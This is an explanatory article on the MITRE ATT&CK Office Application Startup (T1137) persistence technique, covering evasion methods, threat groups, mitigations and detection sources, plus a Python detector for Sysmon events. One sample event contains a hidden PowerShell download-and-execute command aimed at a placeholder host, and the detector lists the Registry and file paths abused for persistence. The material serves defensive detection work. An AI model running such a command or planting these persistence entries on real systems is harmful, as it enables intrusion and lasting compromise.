Office Application Startup (T1137) is a persistence technique in which adversaries abuse legitimate functionality of Microsoft Office components so that malicious code is loaded whenever an Office process starts, typically by modifying template macros, Registry keys, or cloud-synchronized configuration. Defensive measures include monitoring for anomalous process trees, detecting changes to the relevant Registry paths, analyzing Office document metadata, and using dedicated tools to scan for malicious rules and form configurations.
To evade conventional detection, attackers have developed multi-layered stealth techniques that restructure the attack chain through dynamic code loading, configuration mimicry, and cloud-hosted storage, embedding malicious behavior deep inside the normal business logic of Office components. The result is a persistence pattern in which the process is legitimate, the data is encrypted, and the observable behavior looks compliant.
Current stealth techniques rest on two strategies: changing the form of the attack payload and abusing trust in the execution environment. Dynamic decryption and loading of macro code separates the stored (encrypted) form of the code from the executed (in-memory) form, defeating static signature detection. Registry key masquerading builds a hidden persistence entry point that follows Microsoft's own configuration conventions. Abuse of cloud configuration synchronization spreads the attack chain across cloud service infrastructure. Process hollowing keeps the payload off the file system while preserving the appearance of a legitimate process. What these techniques share is deep exploitation of the Office ecosystem's trust boundaries: redirecting legitimate features, encoding and obfuscating business data, and manipulating system mechanisms so that malicious operations become sequences of authorized actions. Defenses built on rule matching or single-point anomaly detection struggle to respond to this.
This evolution forces defenses toward full-lifecycle monitoring: combining in-memory behavior analysis, cloud configuration auditing, and process-lineage detection into a coordinated endpoint-and-cloud framework, and strengthening visibility into the low-level mechanisms of Office components, in order to cope with increasingly covert persistence.
| Effect type | Present |
|---|---|
| Signature masquerading | ✅ |
| Behavioral transparency | ❌ |
| Data obscuring | ✅ |
| Spatio-temporal trace dispersal | ✅ |
Signature masquerading: by mimicking the structure of legitimate Registry keys, hijacking the Office process call chain, and disguising cloud configuration sync requests, attackers make malicious persistence mechanisms closely resemble normal business operations in their Registry paths, process-tree relationships, and network protocols. For example, a malicious COM add-in configuration can be placed under the standard Office Registry branch for add-ins, and a valid digital signature can be used to pass application-control policy checks, effectively "allowlisting" the malicious component.
Data obscuring: memory-resident code and cloud-synchronized payloads are obfuscated with layered encryption, and malicious configuration is delivered over HTTPS, so defenders cannot obtain usable attack fingerprints from traffic inspection or static analysis alone. Encryption keys are split and stored across document metadata and Registry values, further raising the cost of reverse engineering.
Spatio-temporal trace dispersal: cloud configuration sync lets attack triggers execute asynchronously across devices, and the globally distributed architecture of Office 365 dilutes behavioral signatures. Activation is aligned with the user's working hours and fires infrequently (for example, on the first working day of each month), greatly widening the time window an anomaly detector must cover; detection models built on short-term log analysis struggle to catch it.
| ID | Name | Description |
|---|---|---|
| G0050 | APT32 | APT32 have replaced Microsoft Outlook's VbaProject.OTM file to install a backdoor macro for persistence.[1][2] |
| G0047 | Gamaredon Group | Gamaredon Group has inserted malicious macros into existing documents, providing persistence when they are reopened. Gamaredon Group has loaded the group's previously delivered VBA project by relaunching Microsoft Outlook with the |
| ID | Mitigation | Description |
|---|---|---|
| M1040 | Behavior Prevention on Endpoint | On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent Office applications from creating child processes and from writing potentially malicious executable content to disk.[4] |
| M1042 | Disable or Remove Feature or Program | Follow Office macro security best practices suitable for your environment. Disable Office VBA macros from executing. Disable Office add-ins. If they are required, follow best practices for securing them by requiring them to be signed and disabling user notification for allowing add-ins. For some add-in types (WLL, VBA) additional mitigation is likely required, as disabling add-ins in the Office Trust Center does not disable WLL nor does it prevent VBA code from executing.[5] |
| M1054 | Software Configuration | For the Office Test method, create the Registry key used to execute it and set the permissions to "Read Control" to prevent easy access to the key without administrator permissions or requiring Privilege Escalation.[6] |
| M1051 | Update Software | For the Outlook methods, blocking macros may be ineffective as the Visual Basic engine used for these features is separate from the macro scripting engine.[7] Microsoft has released patches to try to address each issue. Ensure KB3191938, which blocks Outlook Visual Basic and displays a malicious code warning, KB4011091, which disables custom forms by default, and KB4011162, which removes the legacy Home Page feature, are applied to systems.[8] |
| ID | Data Source | Data Component | Detects |
|---|---|---|---|
| DS0015 | Application Log | Application Log Content | Monitor for third-party application logging, messaging, and/or other artifacts that may leverage Microsoft Office-based applications for persistence between startups. SensePost, whose tool Ruler can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.[9] |
| DS0017 | Command | Command Execution | Monitor executed commands and arguments that may leverage Microsoft Office-based applications for persistence between startups. Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.[10] SensePost, whose tool Ruler can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.[9] |
| DS0022 | File | File Creation | Monitor for newly constructed files that may leverage Microsoft Office-based applications for persistence between startups. |
| DS0022 | File | File Modification | Monitor for changes made to files that may leverage Microsoft Office-based applications for persistence between startups. |
| DS0011 | Module | Module Load | Monitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process. |
| DS0009 | Process | Process Creation | Monitor newly executed processes that may leverage Microsoft Office-based applications for persistence between startups. Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously. |
| DS0024 | Windows Registry | Windows Registry Key Creation | Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.[11][12] |
| DS0024 | Windows Registry | Windows Registry Key Modification | Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.[11][12] |
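The Process Creation, File Creation and Windows Registry data components in the table above translate into concrete detection logic. The following Python script is an added example (not code from the original page, MITRE or SensePost) that runs over a handful of constructed Sysmon-style events (Event ID 1 process create, 11 file create, 13 registry value set) and reports an Office parent spawning an unexpected child, writes into Office startup locations such as Word's STARTUP folder or Outlook's VbaProject.OTM (the APT32 procedure listed earlier), and changes to add-in `LoadBehavior`, Office Test or Outlook WebView (Home Page) values. The allowlist of expected child processes, the sample events and the user SID in the Registry paths are assumptions.

```python
"""Detect T1137-style Office persistence from Sysmon-style endpoint events.

Added example (not the page's or MITRE's code). Covers three data components:
Process Creation (Office parent spawning an unexpected child), File Creation
(writes into Office startup locations) and Registry value modification
(add-in LoadBehavior, Office Test, Outlook WebView Home Page). All events
below are constructed; the SID and file paths are assumptions.
"""
import fnmatch

OFFICE_IMAGES = {'winword.exe', 'excel.exe', 'powerpnt.exe', 'outlook.exe',
                 'msaccess.exe', 'mspub.exe', 'visio.exe'}

# Children an Office parent routinely spawns in this (assumed) baseline;
# anything else is reported. Tune per environment.
EXPECTED_CHILDREN = {'splwow64.exe', 'ai.exe', 'werfault.exe', 'dw20.exe'}

# Office startup locations: Word STARTUP / Excel XLSTART folders, Normal.dotm,
# Outlook VbaProject.OTM and the roaming Addins folder. Lower-case globs.
STARTUP_FILE_GLOBS = (
    '*\\appdata\\roaming\\microsoft\\word\\startup\\*',
    '*\\appdata\\roaming\\microsoft\\excel\\xlstart\\*',
    '*\\appdata\\roaming\\microsoft\\templates\\normal.dotm',
    '*\\appdata\\roaming\\microsoft\\outlook\\vbaproject.otm',
    '*\\appdata\\roaming\\microsoft\\addins\\*',
)

# Registry values used for Office persistence, in Sysmon TargetObject form
# (HKCU appears as HKU\<SID>). Lower-case globs.
PERSISTENCE_REG_GLOBS = (
    'hk*\\software\\microsoft\\office\\*\\addins\\*\\loadbehavior',
    'hk*\\software\\microsoft\\office test\\special\\perf*',
    'hk*\\software\\microsoft\\office\\*\\outlook\\webview\\*\\url',
)

def _base(image):
    """File name of an image path, lower-cased."""
    return image.rsplit('\\', 1)[-1].lower()

def _matches(path, globs):
    low = path.lower()
    return any(fnmatch.fnmatchcase(low, g) for g in globs)

def classify(event):
    """Return (rule, detail) for a suspicious Sysmon event, else None."""
    eid = event['EventID']
    actor = _base(event.get('Image', ''))
    if eid == 1:  # ProcessCreate
        parent = _base(event.get('ParentImage', ''))
        if parent in OFFICE_IMAGES and actor not in EXPECTED_CHILDREN:
            return ('office_child_process',
                    f'{parent} -> {actor}: {event.get("CommandLine", "")}')
    elif eid == 11:  # FileCreate
        target = event.get('TargetFilename', '')
        if _matches(target, STARTUP_FILE_GLOBS):
            return ('office_startup_file', f'{actor} wrote {target}')
    elif eid == 13:  # RegistryEvent (value set)
        target = event.get('TargetObject', '')
        if _matches(target, PERSISTENCE_REG_GLOBS):
            return ('office_persistence_registry',
                    f'{actor} set {target} = {event.get("Details", "")}')
    return None

def detect(events):
    """Run classify() over an event stream; return (time, rule, detail) alerts."""
    alerts = []
    for event in events:
        hit = classify(event)
        if hit:
            alerts.append((event['UtcTime'], hit[0], hit[1]))
    return alerts

WINWORD = r'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
SID = r'HKU\S-1-5-21-1111-2222-3333-1001'  # constructed user hive

# Constructed events: three benign, four matching the rules above.
EVENTS = [
    {'EventID': 1, 'UtcTime': '2024-03-01 09:02:11', 'ParentImage': WINWORD,
     'Image': r'C:\Windows\splwow64.exe', 'CommandLine': 'splwow64.exe 12288'},
    {'EventID': 1, 'UtcTime': '2024-03-01 09:03:40', 'ParentImage': WINWORD,
     'Image': r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe',
     'CommandLine': 'powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(\'https://example.invalid/s\')"'},
    {'EventID': 11, 'UtcTime': '2024-03-01 09:03:42', 'Image': WINWORD,
     'TargetFilename': r'C:\Users\alice\AppData\Roaming\Microsoft\Word\STARTUP\helper.dotm'},
    {'EventID': 11, 'UtcTime': '2024-03-01 09:05:00', 'Image': WINWORD,
     'TargetFilename': r'C:\Users\alice\Documents\report.docx'},
    {'EventID': 11, 'UtcTime': '2024-03-01 09:06:15', 'Image': r'C:\Users\alice\AppData\Local\Temp\setup.exe',
     'TargetFilename': r'C:\Users\alice\AppData\Roaming\Microsoft\Outlook\VbaProject.OTM'},
    {'EventID': 13, 'UtcTime': '2024-03-01 09:06:20', 'Image': r'C:\Windows\System32\reg.exe',
     'TargetObject': SID + r'\Software\Microsoft\Office test\Special\Perf\(Default)',
     'Details': r'C:\Users\alice\AppData\Local\Temp\perf.dll'},
    {'EventID': 13, 'UtcTime': '2024-03-01 09:07:00', 'Image': WINWORD,
     'TargetObject': SID + r'\Software\Microsoft\Office\16.0\Word\Options\AutoSaveInterval',
     'Details': 'DWORD (0x0000000a)'},
]

if __name__ == '__main__':
    for when, rule, detail in detect(EVENTS):
        print(f'{when}  {rule:28} {detail}')
```

The process-tree rule is deliberately an allowlist rather than a blocklist of known-bad children, since the technique relies on Office being the parent of whatever the attacker chooses to run; the file and Registry rules key on the persistence locations themselves, so they fire regardless of which process performs the write, which is what catches the VbaProject.OTM replacement performed by a dropper rather than by Outlook.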